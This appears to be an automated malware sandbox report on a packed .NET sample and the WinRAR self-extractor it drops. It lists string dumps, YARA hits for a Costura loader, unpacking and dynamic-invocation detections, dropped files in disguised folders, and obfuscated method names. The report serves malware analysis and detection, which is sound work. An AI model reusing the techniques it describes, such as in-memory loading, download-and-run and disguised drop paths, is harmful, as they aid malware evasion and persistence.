Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: ry0bqfj0.vyo.exe, 00000002.00000003.1742337772.0000000006E86000.00000004.00000020.00020000.00000000.sdmp, ry0bqfj0.vyo.exe, 00000002.00000003.1742864417.000000000582F000.00000004.00000020.00020000.00000000.sdmp, ry0bqfj0.vyo.exe, 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmp, ry0bqfj0.vyo.exe, 00000002.00000000.1740871904.0000000000803000.00000002.00000001.01000000.00000007.sdmp, ry0bqfj0.vyo.exe.0.dr
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed4'^q source: LaRHzSijsq.exe, 00000000.00000002.1742291548.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Nullable`1UInt32ToInt32Dictionary`2<lRencpcIjuzIuqxVSgTADEIaodGVOrDrPhsxoUqFBxhEpdZKwyvHvpzGjdZYJhUSRiTmXaGYQoZfweLldVzpVVVzIMokVrVtCpNhjNMwSxRhptjesOVOHFWVmuElLvdysFChrDbqjdxyeOjoDjRhwhMXsRUPjBKwutOJRbNOMFEEhyRykpIBDVblTEOzImgIsbeKZzxBwduRChPUawETSiSyrDQmnofAyWlgtgyLR><Module>FUDGetHINSTANCE<>OSystem.IOOPTIMZCosturacostura.metadatamscorlibSystem.Collections.GenericReadLoadDownloadAddisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedsubscribesourceCompressionModeExchangenullCacheIDisposableRuntimeTypeHandleGetTypeFromHandleDownloadFileget_Moduleset_WindowStyleProcessWindowStyleget_Nameget_FullyQualifiedNameGetAssemblyResourceNameset_FileNameGetRandomFileNamefullNameGetNamerequestedAssemblyNamenameTypecultureDisposeFileLocateWriteCompilerGeneratedAttributeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteget_Valueget_HasValueTryGetValueadd_AssemblyResolveOPTIMZ.exeSystem.ThreadingSystem.Runtime.VersioningCultureToStringAttachGetTempPathget_LengthEndsWithUrinullCacheLockMarshalkernel32.dllurlReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemSystemMainAppDomainget_CurrentDomainFodyVersionSystem.IO.CompressiondestinationSystem.GlobalizationSystem.Reflectionset_PositionStringComparisonCopyToget_CultureInfoget_StartInfoProcessStartInfoAssemblyLoadersenderResolveEventHandlerEnter.ctor.cctorMonitorIntPtrSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesReadFromEmbeddedResourcesDebuggingModesGetAssembliesresourceNamessymbolNamesassemblyNamesget_FlagsAssemblyNameFlagsResolveEventArgsargsEqualsget_CharsProcessRunprocessConcatObjectVirtualProtectSystem.Netop_ExplicitExitGetValueOrDefaultToLowerInvariantWebClientStartConvertOPTIMZ_ProcessedByFodyContainsKey<0>__ResolveAssemblyGetCallingAssemblyReadExistingAssemblyGetExecutingAssemblyCopyIsNullOrEmpty source: LaRHzSijsq.exe
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|806F4C19B2D7FD9E3B836269EC07647019A29E95\|7960 source: LaRHzSijsq.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LaRHzSijsq.exe

Unpacked PE file: 0.2.LaRHzSijsq.exe.9b0000.0.unpack cz}rRa^:EW;.text:ER;.rsrc:R;<gfAAjIM:ER;.reloc:R; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:ER;Unknown_Section4:R;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx System.AppDomain.Load(byte[])
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx System.Reflection.Assembly.Load(byte[])
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx System.AppDomain.Load(byte[])
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx System.Reflection.Assembly.Load(byte[])
Source: 2.3.ry0bqfj0.vyo.exe.6ed3531.0.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	.Net Code: dhKmQBcNjx

Yara detected Costura Assembly Loader

Source: Yara match	File source: LaRHzSijsq.exe, type: SAMPLE
Source: Yara match	File source: 0.0.LaRHzSijsq.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1689751552.00000000009B4000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1742291548.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LaRHzSijsq.exe PID: 7272, type: MEMORYSTR

Source: LaRHzSijsq.exe

Static PE information: 0xBE4DBCEE [Thu Mar 5 07:21:18 2071 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: <gfAAjIM

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe

File created: C:\Users\user\AppData\Local\Temp\WinSattl\__tmp_rar_sfx_access_check_7293750

Jump to behavior

Source: LaRHzSijsq.exe	Static PE information: section name: cz}rRa^
Source: LaRHzSijsq.exe	Static PE information: section name: <gfAAjIM
Source: ry0bqfj0.vyo.exe.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EE28C push eax; ret	2_2_007EE2AA
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007ECAB5 push eax; retf 007Eh	2_2_007ECACE
Source: C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe	Code function: 2_2_007EED46 push ecx; ret	2_2_007EED59
Source: C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe	Code function: 6_2_00007FFD9B7500BD pushad ; iretd	6_2_00007FFD9B7500C1
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 32_2_00007FFD9B7600BD pushad ; iretd	32_2_00007FFD9B7600C1
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\Registry.exe	Code function: 35_2_00007FFD9B7700BD pushad ; iretd	35_2_00007FFD9B7700C1
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 37_2_00007FFD9B7600BD pushad ; iretd	37_2_00007FFD9B7600C1
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B7600BD pushad ; iretd	38_2_00007FFD9B7600C1
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B778799 pushad ; ret	38_2_00007FFD9B77879A
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B7786E2 push esp; ret	38_2_00007FFD9B7786E3
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B77ED92 pushad ; ret	38_2_00007FFD9B77EDBD
Source: C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe	Code function: 38_2_00007FFD9B77ECF1 pushad ; ret	38_2_00007FFD9B77EDBD

Source: LaRHzSijsq.exe	Static PE information: section name: cz}rRa^ entropy: 7.890339146660966
Source: LaRHzSijsq.exe	Static PE information: section name: .text entropy: 7.062227534981493

Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, wCRCqQv10iAMSJiBD4H.cs	High entropy of concatenated method names: 'aBMyET7djC', 'KFDylxxHY2', 'JILyHRffm7', 'oCiyGcAYDf', 'DujyjFkE4F', 'FQlyXVJsaqKD4ifUjTl', 'OeOaDIJAOl6Vd8FQequ', 'H2J5uCJmncx7x61GmUH', 'Bufw5UJ8nYCgQUiAnON', 'eStexpJKOuxyPZN4CLB'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, Txf1XOS9NCuLsTnKqV.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'Jn1iWVAh9', 'VfXkumRs1jyAqF7Oc8B', 'M0P2b6R8LGN1LLwPZl8', 'dkoPvCRKulOABZdGIWc', 'MYSbkhRgOT3fHe6hXeW', 'L48WloRH17HqmHRWvXN'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, lgg0Z7mNgdGBQKlNoO8.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, otlgHBgUNMXArfNorCh.cs	High entropy of concatenated method names: '_223', 'QNhRdTKAFPcYbPWDdkb', 'ui8SECKm9g9tIld3fSo', 'E1qLQuKs5Q1Wjqc48RO', 'BcUMgBK8ZfyG2SmWfAE', 'FbstlZKKJBsBgl2FGZC', 'ob3T2HKgVFq43Ai2vva', 'YeEJXeKH4VBBs9CcKy4', 'wNlMkvKkRp1lqtFhg3u', 'QjuYU5KiJQdCDZKXR2q'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, Wk1oPh2rOTY60W20WJf.cs	High entropy of concatenated method names: 'cxMFrtvueL', 'cjstbXSRRRchnS1YrKT', 'oKs7xKSnb3xrUsf8sAn', 'ko4ghhSDro13VxUVtEJ', 'xx4I8SSFttmNhJlH98p', 'HNmSyiSrj6TnjP0yPfM', 'P9t0rCSdM1XvnZk0fqC', 'HHKFmySVbZHLTGfQe7i', 'EeLFIky7bQ', 'aguEeYSYM3xX1L02PRO'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, VusmbQ41FIGnF38VUKm.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, aPrCfLPth67pJ8MIki.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'YXl88lrAy4347rEhQhq', 'Kx9dAmrmaNCMHpQPUmb', 'xdYyb1rsNr6lFtladYE', 'KCCJZwr8n5nO1BLcmAg', 'cJochvrKOAtEfFJCXbU', 'GYfZAergMHOqaoKLCRR'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, hDcFVo2K4litZ1v9x33.cs	High entropy of concatenated method names: 'z57RFaCrEw', 'XlGRR7Qu7K', 'F41RmroeLQ', 'hCZy35SWEhKh1SVPK0D', 'sLQOAbSoxBbIddT41Fe', 'kFlIhaSEOu7XZUMCZpm', 'GjuBhgSQLLqyDN3PlXH', 'xk0nKKSc0KuCjyZwp54', 'eeV7A9SUKeymN1TGf4M', 'mR8PAjSvLJ2n2aZAKFj'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, he3Xvn2pbb7RVwtgLqD.cs	High entropy of concatenated method names: 'tFuRN5mRQ4', 'RYWUCp6V9UB4V1hW5JC', 'MHFsuw6C6Xh6i4EKT9t', 'CyiCjO6rUopyeTKlumd', 'b0KAeG6duKGhfjy9Ljs', 'pCW0GK64pyAvPT9n62d', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, epshhpmkUxeiGeC9rvR.cs	High entropy of concatenated method names: 'YowIc8BdOp80xqEp5va', 'A5MPaxBVYTpyhbSPv3g', 'hMDNyZBnM82fEAu39f1', 'IqOZmlBrtN3KKZJdfuq', 'T1jrhpBC4pkRVMjges7', 'pcx8KAB4pijVn593enp', 'rJsjO7BYfABrYuWLkSa'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, fQUZgP4ZIgO94vXhqvC.cs	High entropy of concatenated method names: 'fU2qrUTOPS', 'eOsqDF0Zi3', 'TyMqIIe4VZ', 'CK9q6ERZyZ', 'yEtqbYGIjD', 'Y8GqYjph9P', '_838', 'vVb', 'g24', '_9oL'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, QFhAp72H0YMMuvDVfMR.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'nXpfBw4ilNkPBGPpJDk', 'SlcOJA4OH2JVTQd6ydd', 'aNOD4G47waic162KPxH', 'z2aV9p4JbGr7HZk4S8S', 'EnKNeW4aY0d4Iqt7AEp', 'J4nMZk4NPFZkTQgmCeJ'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, la1DcNmrtxpkw8wuCxf.cs	High entropy of concatenated method names: 'uQ91IqjNUJ', 'wCb16DQZat', 'KUS1bWbXop', 'OZVXI50ufJoSJ2jf2PA', 'Bps3jN0BZmYXC2YMovp', 'IlSMpl0IvJ4CBXUShsO', 'wY3TbR0hBJnSp4lBBYO', 'OFK2wy094npPiGhlqrX', 'vdbMh50yv4UVAsXeVth', 'Oykhvf0pwJCNg0TRJrV'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, A92aGYg2qXvEvHWDOxj.cs	High entropy of concatenated method names: 'Ds0BonLdhp', 'a6GBAYelXh', 'e3wB3khdJW', 'nd6B4JHYyZ', 'BgYwXomzAAvlcAeV51W', 'asvJrTmZ2wYEYJArL9E', 'BklvUHmq43PWlEug7KJ', 'p1DOXxsDnrQHUJmSjtJ', 'JEXeCQsFPYggCkTr73o', 'YPvMbAsRW42omjXnHcl'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, dYmJHG5FWATExpL0yo.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'tiwQsHdc5Lm6tr6kiBJ', 'X7cpgWdUs571WmdyP3B', 'P2fu28dvqsfk8iJHhdh', 'n60lvsdjhMyW2cBwJGi', 'pxFLc1dZCEwbVvaF3Sm', 'hlgPbFdqmPWhq9lBJpX'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, VqIxF22Fb0smY0rsSNj.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'TRTn1sCIe8bRR3Dh0AN', 'RctEGKCuIn4lwCTXM1f', 'Ooo0aUChCh5YvDhDv8w', 'q0NcC1C9WYgdF8QSaey', 'cyqRAQCyiZosYUfv2tn', 'jCYq97Cp46OJFHPtbUg'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, i0UqNVWX0qm66klCMW.cs	High entropy of concatenated method names: 'Hx2lsVXdI', 'yV4HoSnjR', 'VV2GorLH6', 'l96dYsFBhvYUP2Bbpor', 'SGFlGdFXrPXRh0iCMke', 'idWNiVF0q9KBbedmvid', 'vanZRMFIfI0re9PwGlK', 'p2UCJ8Fuf5aCLZZrpOd', 'gkqbveFhySYd1Sp7vaS', 'mEZKKPF9VvcB3dVfNRU'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, H93KEXvaqLB5ujJSv0x.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, z0Ig4vmexO3eYYydAWr.cs	High entropy of concatenated method names: 'Fra18ljtxU', 'LMk1fHRbA9', 'TNv1KgY71T', 'urk1Oj0GQF', 'f1e1MXpYXe', 'lAb1hfLScx', 'VpwW5T0LX9Ij1CC0LU4', 'nrmj3W0TxeIe4B96lrF', 'Cmq0mZ0bBq2Q31a8qIE', 'YSHBbd0Ebkd3NrOBfao'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, KnNM6nYaqpRW1JbXbwS.cs	High entropy of concatenated method names: 'ucOIY4HHa50Rc', 'R6dxmjTlARbQ121co4A', 'HdVUW8Txuo0KfF9liOe', 'BonyROT155UpKNyImi9', 'tV1qoWTAqvMnZIVdI5S', 'rv8mwhTmpjW9bMGUiOk', 'l8w7g5Tt4bhjFOhDwOp', 'Nv5MkOTPaDFDSvBIHjO', 'nR5RX4TspsIbJvZUyC4', 'TTyDfmT8SbZywaTZrIf'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, imdDpA2Tx2y7GCfknh8.cs	High entropy of concatenated method names: 'hhERxAao6G', 'QLKRJv2QJP', 'pvJjPdw6Wr66QVFbSyF', 'qcQp7gwSXcNpD0feqMM', 'K8yX1KwwAqXEai1xJqf', 'oHD9sCw2dhRL74e6vpI', 'EBSNRkwt4xVLyQkK69J', 'LPBgi8wPBFLy6uQWlrH', 'nyg2ZFwlNSG1vm4TrpU', 'G2mtIpwxtpZRCAMULZc'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, wG8i6MIb3xSdARxgJ02.cs	High entropy of concatenated method names: 'nT0gZvBcPc', 'iNMgUl2KxC', 'A8ugpON3am', 'JDxgcbZ0cQ', 'rLMg1Qpv5s', 'mu9I5SxDSDRVa8BXkhI', 'u7u9oZxFFUrsJutOHCf', 'G2aE6Dlqt1gR8GDXICa', 'eYCLMglzH8OMGJTLjXE', 'RBmgbbxRtLrUUDc9ul3'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, eanMAX2uAVZb9rG25pj.cs	High entropy of concatenated method names: 'WD4FoGhZvB', 'rAM82O4AcLqFIIWSECq', 'qtK9ZF4m1hZ4JXgVv8O', 'YbfqQ04xEr2mWrQAWUP', 'j1Xn8Z41rZgfkbEHW3b', 'dXyvKm4soeCVDoXU82c', 'AFDDsP48WIoNT2jnqgu', 'RO5QRk4KA6GMUAPy8li', 'yXeEm14grPO01MBvRAV', 'f28'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, EEvO9XYxD1PUC4GnMMu.cs	High entropy of concatenated method names: 'St7c8MT7blEh0QI38oG', 'e46kZATJRcvN13lsRXf', 'gD8GsyTiTNlrXOliefY', 'Y9lIIFTOvrClfLM5YOX', 'ckB3QPuZri', 'OO3krdTMc3cee42h0IK', 'mXGy4nTfi1qZAHtHIjj', 'r3hXtFTecJ5TPmaLSS5', 'Yiov8JT5QLTCyoKY6Ow', 'D7H5rXTGh5NISTn81SD'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, NI2E0E234ZKETGHLnm2.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'paGbYiCCF9fuMdZ4Jly', 'D0RMBcC4DCkqMjjM5F8', 'Hx5cUSCYvsww3IqThjg', 'zsFDPTCSrKnkSHdkCdF', 'WlckAECw92oF9DdoM3C', 'nwFXyYC6pychLAcEE6e'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, OWn6hy21VR0yIM9h8nu.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'FvW8t14qJjHULGhJay9', 'NliuLw4zNLQ8ymBU0YM', 'URie62YD57mUI7aLY0C', 'K1hyMuYFV7ylZG2B6ZV', 'Qn5lC6YRLiSkXr8mBbY', 'raqdLaYn9LX5JoI97gr'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, yBmwkPgXT3Scgc2CrYd.cs	High entropy of concatenated method names: 'KBmnE59cGg', 'eDrnltUKVy', 'VphnH6SsDW', 'KSHQX4KPIRZTxjP4wg9', 'KW4Kx4K2yYjltSXppkx', 's8XvJwKt6dOmFdJ2M7b', 'jZTM5dKlrIZwrwd1n1K', 'BsknSFeVR4', 'dcSnWSSTJX', 'oDZnVKocDt'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, bYLrucIF88tT9t3F4AC.cs	High entropy of concatenated method names: 'eHxmOQoLP6', 'Px2ZujPnFQXQq42uJ8O', 'bpcn1PPr6nNAVJtnP94', 'HtjPdcPFteP18BMIWVA', 'Kw5EPbPRLwgCNvZaGjX', 'mTkt40PdWEa5cEtKtug', 'k2woYqPVC27Na1J4qGR', 'PdBDvUPCZwSmblYe7Yk', 'XHpAOqP4aJR5stkrn7t', 'Ueh3CHPYQgsrNAjPRjK'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, tHGF3svMd6jGwAYQPR5.cs	High entropy of concatenated method names: 'ckJkEsPw7D', 'M1KklC01rs', 'jMrkHBklO4', 'n8tkGj6bi6', 'ECbkjc9D8K', 'EV00JY73T2CVOkXZULf', 'WkpqTX7X9A833N4DgVB', 'Wl98dn75W5LpIGAAnKx', 'G5so1j7GterKVSHApmL', 'ziW3uB7039i4HbGDfmV'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, eUbTGCgd16LEBOe5CML.cs	High entropy of concatenated method names: '_269', '_5E7', 'iMSBde7MhI', 'Mz8', 'lLwBQIMomP', 'g5QxgukWteMWgikuOBw', 'NNHLf1koC07iJ5ll823', 'fvaqLVkcPWiNr1iH66n', 'r9jxZ5kUqrYwvos8d1Y', 'QpF1Wekv0iDs201gtnn'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, MBgYgW4PMi90fG3EJZq.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'xSCodvPncq', 't6aoL5wlcD', 'AB7ox3nmDS', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, TO3d7u2L0OwSYsEEMBZ.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'rEVqfhweTZNnbBGYPFo', 'bhRKU5w5xXH3M7qahda', 't41M6dwGAap20tRoSjO', 'g8FBEUw3VrCq8aafeN3', 'hoUMCVwX2kpYtygZlDJ', 'FMrGe8w0bdJvSZovHCa'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, fsl0D2gp3IYhW2MYYam.cs	High entropy of concatenated method names: 'MnPFaZi0ufKQFJd0RlU', 'RWRfy8iBLywfA2oYE1F', 'cOZMPyi3yO2i4qVxCuF', 'FTKl2ZiXHDtxFZEtTsY', 'IWF', 'j72', 'MuxLVCNoIF', 'mKrLv2NKGG', 'j4z', 'jB7L22t2Us'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, MfEcNT2sdJB1Mjq7u5v.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'DTlrRMwKSJOLopmhB9A', 'aaqsrRwgrXGr3i4s1Qd', 'QKFTWHwHprxbbhWbnra', 'giQUsBwkaNpaoGp747r', 'NkNluywi6uhgcHIVcDP', 'EWrnxSwOp8A9cWcwqAx'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, admxbKgzCtRcItG9Ixu.cs	High entropy of concatenated method names: 'JbqLaniOex', 'egZL02RAWL', 'TDiLoiyfPi', 'hKXlH9ihw0ZRgqcOARU', 'Fyms5gi9esnO1ntcQT0', 'M97kW4iIJUCBxGgW3hF', 'C1lhlPiutLcpF7eFxaM', 'urelIgiy82rDILsobmq', 'dWISbripl7Xcx0VlGY3', 'vOcU01iT0SWfoR92yPe'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, GXYanqTl2kopDS8SFn.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'UUUlZ3ryWV8K4QjEJgZ', 'zDDZfOrpnUmGPR49Mij', 'kPkl9krToeOyWt0wohA', 'zfjZxtrbcRRAmGjlwXP', 'B3YG72rLggcLobZSn0l', 'wAXadHrEgK4O3Vh4MYP'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, qg7bfWgCPFGWrN3sQf8.cs	High entropy of concatenated method names: 'nQaFmEMc7q', 'PmyFzZxgX1', 'HLVR3SHyNgNAilHl6NK', 'CfQe0UHpMudcLJVa10k', 'MoqyWMHhj21oGt0qNEk', 'RSuX5QH9sT82vIVGB48'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, WSf9q42YtG9dMiW2Tdc.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'SvE4lEVU5VHsr3qhrK1', 'U75Q8FVvZRv893PATCk', 'jW9iq5VjBxB0QolvGAg', 'nabeRGVZMG4weWLwNYU', 'BVCRPuVq7g9N8WXTHT4', 'dhnEjuVz5ccoa9wfhyQ'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, d6VT25I3PBiDwdaUFvJ.cs	High entropy of concatenated method names: 'a8hm4XJ9sF', 'SilmE2OHZS', 'iTOmlAx6R8', 'uPjmHBmPBJ', 'WRemGqj2nd', 'M2smj12jn6', 'rCSm7iiI6P', 'CaoTWTtiU0qa8lxR5sf', 'p9o1cMtHifmXjWIb8qF', 'rygNvNtk7eDHnpv1lgB'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, ecpNa6tfFqrOfMXMLs.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'zhhwodppP', 'ruyxjyR3rXBD3PhKEJB', 'yO1HAURXJU0FYPh0QeM', 'xAvZkpR0DqGccIV6ZSX', 'ALtUP2RBb8o0ZaT3Cc1', 'dPIttsRIedhDLJv8jp8'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, XQImTQvUi625NmQxCYb.cs	High entropy of concatenated method names: 'rjeJHdj2th', 'MCLJG76rTT', 'BeEJjZs4KW', 'S8kJ7LwnTv', 'OrKJiPipZ3', 'H0g5orOq8dqx2bmlRUs', 'vBfc06OzOwrKkA0etBa', 'k7KwtXOj2focEpTImyJ', 'BsUtxGOZ2lJBmEWMdEj', 'S5EU8K7D0GIVCqXFLlJ'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, GNdGB1IRujvnT8hM8cl.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'FLEelwkcVO', 'vZ1eHhub9y', 'yD7eGChveG', 'E0Uejkgl5E', 'oM6e7LRRdr', 'wTfudwAYY0chduIVyTY', 'l613bDAS7EGXV7iZYZg', 'R7EY56ACdoCNmdmRYc4'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, VUrg1p4lpRudpDghICi.cs	High entropy of concatenated method names: 'b56op7V8Nf', '_1kO', '_9v4', '_294', 'p5DocHrFqw', 'euj', 'Qa2o15nvqS', 'NoSoqirTe7', 'o87', 'WLuos7308I'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, iU2jXZg9N8x5XeD9FCX.cs	High entropy of concatenated method names: 'Hmyn8OVihv', 'JIcnfo99vS', 'qnDnKFrE8e', 'pjRnOdbKMm', 'a30nMRuBrl', 'KVf14UgVJqRAwOYffvU', 'jq1imvgCOnvWrVwRthf', 'uvFNS2grFgtg5WyTn3v', 'Xl0HZIgdS5b50NI7fyK', 'fiDZA2g4cLZ5yaka3Dm'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, oUGuSY2gky213qw6cTa.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'zIbxFXVMkwVp7bsRHfB', 'Y9I50UVfaCYKjTNynxO', 'NfsOafVeh7g59r795cW', 'XWVwEWV5HoWugY4pfae', 'c86praVGlQTn88bUp1X', 'KKrajoV3RpDNEVZma10'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, jrowY1gHPI72fX12oXS.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'mspmNtHtjiSFk0Z64Is', 'U76QbdHPJHAJsJhpC29', 'NqDiOEHlFdiFjp14Pxm', 'g3a0G7Hx0ZeJRIeaFke'
Source: 2.3.ry0bqfj0.vyo.exe.587c531.1.raw.unpack, gkuat0gsG3HJ4LIbHLF.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'v8eByggPp6', '_168', 'wgrdd7kO3bnh8QKkwIZ', 'eY3PPPk7ZthL1YZtseQ', 'sT7tdbkJTyguVf1hTbx', 'ApGIX7kaTIYwU2Vota8', 'XyNGcMkN00gQKsGrMn3'
